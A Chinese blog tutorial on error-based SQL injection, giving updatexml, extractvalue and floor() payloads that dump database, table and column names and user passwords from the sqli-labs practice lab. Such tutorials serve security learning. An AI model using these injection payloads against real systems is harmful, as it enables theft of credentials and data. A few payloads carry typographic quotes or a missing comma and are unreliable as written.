SQL注入之报错注入流程以及实践操作

报错注入流程:

​ 1.判断是否存在注入点
​ 2.构造错误的语法制造报错
​ 3.使用报错函数:updatexml,extractvalue,floor(),exp()等。

sql报错注入:extractvalue、updatexml报错原理:
转载于:https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html?spm=a2c4e.10696291.0.0.4a3c19a4xQumaw

十种报错注入的方法:
转载于:https://www.cnblogs.com/wocalieshenmegui/p/5917967.html

updatexml:update可更新的,xml可扩展标记语言;

描述:返回替换的XML片段
具有查询功能的函数,用于查询
payload:
updatexml: (xml_document,Xpathstring,new_value)
爆数据库名:

updatexml

0x3a是为了在xpath中是语法错误的
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x3a,database(),0x3a),1) --+
爆表名:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e),1) --+
爆字段名:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1) --+
爆数据:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users),0x7e),1) --+

extractvalue:

描述:使用xpath表示法从XML字符串中提取值
xml_docment:xml标记
Xpthstring: 显示输入语句
new_value:新值

爆数据库名:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat(database())))
爆表名:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(table_name) from information_schema.tables where table_schema=‘security’))))
爆字段名:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’))))
爆数据:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users)))

floor()报错注入:

https://www.cnblogs.com/litlife/p/8472323.html floor的讲解!

准确地说应该是floor,count,group by冲突报错

爆数据库名:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from(select count(*),concat(database(),0x7e,floor(rand(0)*2))x from information_schema.tables group by x) a)

爆表名:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat(’~’,(select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),’~’,floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+

爆字段名:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat(’~’,(select column_name from information_schema.columns where table_schema=‘security’ limit 5,1),’~’,floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+

爆数据:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*) ,concat(’~’(select concat(username,";",password,";")from security.users limit 5,1),floor(rand(0)*2))x from security.users group by x)a)

如果显示不完整:

substring(database(),5,10)

*Substring是字符截取函数,*

*String是字符串*

*从string里面第五个字符开始截取十个字符*

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值